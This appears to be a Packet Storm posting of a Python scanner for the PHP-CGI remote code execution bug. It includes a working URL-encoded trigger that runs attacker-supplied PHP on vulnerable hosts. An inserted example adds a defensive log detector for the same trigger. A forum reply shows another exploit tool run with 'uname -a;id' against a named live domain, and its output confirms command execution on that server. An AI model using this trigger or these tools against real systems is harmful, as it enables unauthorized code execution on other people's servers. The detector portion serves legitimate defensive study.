Fi8sVrs

PHP-CGI Remote Code Execution Scanner

Posted

This small Python script scans for a number of variations on the PHP-CGI remote code execution vulnerability, including "apache magica" and Plesk paths, along with other misconfigurations.

#!/usr/bin/python2
# Written for /r/netsec
# test for the apache-magicka exploit bug. Added plesk and "how not to configure your box" paths.
# infodox - insecurety.net - 2013
# Twitter: @Info_dox
# Bitcoins: 1PapWy5tKx7xPpX2Zg8Rbmevbk5K4ke1ku
# released under WTFPL

import requests
import sys


def scan(target):
    # Common locations where a php-cgi binary ends up reachable over HTTP,
    # including Plesk and hand-rolled "phppath"/"local-bin" layouts.
    paths = ['/index.php', '/cgi-bin/php', '/cgi-bin/php5', '/cgi-bin/php-cgi',
             '/cgi-bin/php.cgi', '/cgi-bin/php4', '/phppath/php', '/phppath/php5',
             '/local-bin/php', '/local-bin/php5']
    for path in paths:
        probe(target, path)


def probe(target, path):
    print "[*] Testing Path: %s" % (path)
    # URL-encoded php-cgi "-d" options; a vulnerable php-cgi treats a query
    # string without a literal '=' as its argv, so these override INI settings
    # and point auto_prepend_file at php://input (i.e. the POST body).
    trigger = path + "/?"
    trigger += "%2D%64+%61%6C%6C%6F%77%5F%75%72%"
    trigger += "6C%5F%69%6E%63%6C%75%64%65%3D%6F"
    trigger += "%6E+%2D%64+%73%61%66%65%5F%6D%6F"
    trigger += "%64%65%3D%6F%66%66+%2D%64+%73%75"
    trigger += "%68%6F%73%69%6E%2E%73%69%6D%75%6"
    trigger += "C%61%74%69%6F%6E%3D%6F%6E+%2D%64"
    trigger += "+%64%69%73%61%62%6C%65%5F%66%75%"
    trigger += "6E%63%74%69%6F%6E%73%3D%22%22+%2"
    trigger += "D%64+%6F%70%65%6E%5F%62%61%73%65"
    trigger += "%64%69%72%3D%6E%6F%6E%65+%2D%64+"
    trigger += "%61%75%74%6F%5F%70%72%65%70%65%6"
    trigger += "E%64%5F%66%69%6C%65%3D%70%68%70%"
    trigger += "3A%2F%2F%69%6E%70%75%74+%2D%6E"
    url = target + trigger
    # Harmless marker script: a vulnerable host runs it and echoes md5('1337x').
    php = """<?php echo "Content-Type:text/html\r\n\r\n"; echo md5('1337x'); ?>"""
    try:
        haxor = requests.post(url, php)
        if "44e902a5aa760d79b76e070fa6725386" in haxor.text:
            print "Exploitable!"
    except Exception:
        print "Err, Someshit broke"


def main(args):
    if len(args) != 2:
        print "Usage: %s <target>" % (args[0])
        print "Eg: %s http://lol.com" % (args[0])
        sys.exit(0)
    target = args[1]
    print "[*] Target is: %s" % (target)
    scan(target)


if __name__ == "__main__":
    main(sys.argv)

#_EOF infodox 2013

PHP-CGI Remote Code Execution Scanner ≈ Packet Storm
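For the defender's side of the same bug, here is an added example (not part of the post or the scanner above) that flags the php-cgi argument injection this scanner probes for in Apache access logs: it checks that the raw query string carries no literal '=' (the condition under which a vulnerable php-cgi treats it as argv, and the reason the trigger encodes '=' as %3D), decodes it, and looks for php-cgi switches and the INI overrides the trigger uses. The log format and sample lines are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Assumed Apache combined-log prefix; only the fields we need are captured.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<uri>\S+) \S+" (?P<status>\d{3})')

# Switches and INI overrides that appear in the scanner's encoded trigger.
PHP_CGI_SWITCHES = {"-d", "-n"}
SUSPICIOUS_INI = ("auto_prepend_file", "allow_url_include", "php://input", "safe_mode",
                  "disable_functions", "open_basedir", "suhosin.simulation")

def is_cgi_arg_injection(uri):
    """True when the request's query string would be handed to php-cgi as argv."""
    if "?" not in uri:
        return False
    raw_query = uri.split("?", 1)[1]
    # php-cgi only parses the query as argv when it has no literal '=', so check
    # the raw (still encoded) string before decoding.
    if "=" in raw_query:
        return False
    decoded = unquote_plus(raw_query)
    tokens = decoded.split()
    if not tokens or not tokens[0].startswith("-"):
        return False
    return (any(t in PHP_CGI_SWITCHES for t in tokens)
            or any(s in decoded for s in SUSPICIOUS_INI))

def scan_log(lines):
    """Return (client ip, request uri, decoded query) for each suspicious request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_cgi_arg_injection(m.group("uri")):
            uri = m.group("uri")
            hits.append((m.group("ip"), uri, unquote_plus(uri.split("?", 1)[1])))
    return hits

# Constructed sample log (RFC 5737 addresses); the first line carries the
# scanner's trigger exactly as the post concatenates it.
TRIGGER = ("%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+"
           "%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69"
           "%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63"
           "%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F"
           "%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70"
           "%3A%2F%2F%69%6E%70%75%74+%2D%6E")
SAMPLE_LOG = [
    '203.0.113.5 - - [18/Feb/2014:11:26:37 +0000] "POST /cgi-bin/php/?' + TRIGGER + ' HTTP/1.1" 200 86',
    '198.51.100.7 - - [18/Feb/2014:11:27:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048',
    '198.51.100.9 - - [18/Feb/2014:11:27:15 +0000] "GET /index.php?about HTTP/1.1" 200 512',
]
```

Running `scan_log(SAMPLE_LOG)` reports only the first line, with its query decoded to the plain `-d ... -n` option list, while the benign query without '=' on the third line is not flagged.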

Posted

Here is what we have:

Test 1:

http://nullsecurity.net/tools/exploit/ap-unlock-v1337.py


python aphp.py -c "uname -a;id" -h koperbent.sk
--==[ ap-unlock-v1337.py by noptrix@nullsecurity.net ]==--
[+] s3nd1ng c0mm4ndz t0 h0st koperbent.sk
HTTP/1.1 200 OK
Date: Tue, 18 Feb 2014 11:26:37 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny16 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny16
Vary: Accept-Encoding
Transfer-Encoding: chunked
Content-Type: text/html

56
Linux server1.wibic.sk 2.6.26-2-686 #1 SMP Sun Mar 4 22:19:19 UTC 2012 i686 GNU/Linux

7e
uid=33(www-data) gid=33(www-data) groups=33(www-data),5003(ispapps),5004(ispconfig),5005(client0),5006(client2),5007(client1)

And then with the one you posted:


python checker.py http://koperbent.sk
[*] Target is: http://koperbent.sk
[*] Testing Path: /index.php
[*] Testing Path: /cgi-bin/php
[*] Testing Path: /cgi-bin/php5
[*] Testing Path: /cgi-bin/php-cgi
[*] Testing Path: /cgi-bin/php.cgi
[*] Testing Path: /cgi-bin/php4
[*] Testing Path: /phppath/php
[*] Testing Path: /phppath/php5
[*] Testing Path: /local-bin/php
[*] Testing Path: /local-bin/php5

The first test uses /cgi-bin/php, which is also present in the second test.

I wanted to modify the one you posted into something multithreaded, and that is how I ran into the problem.

I will come back with an update if I figure out where the problem is.
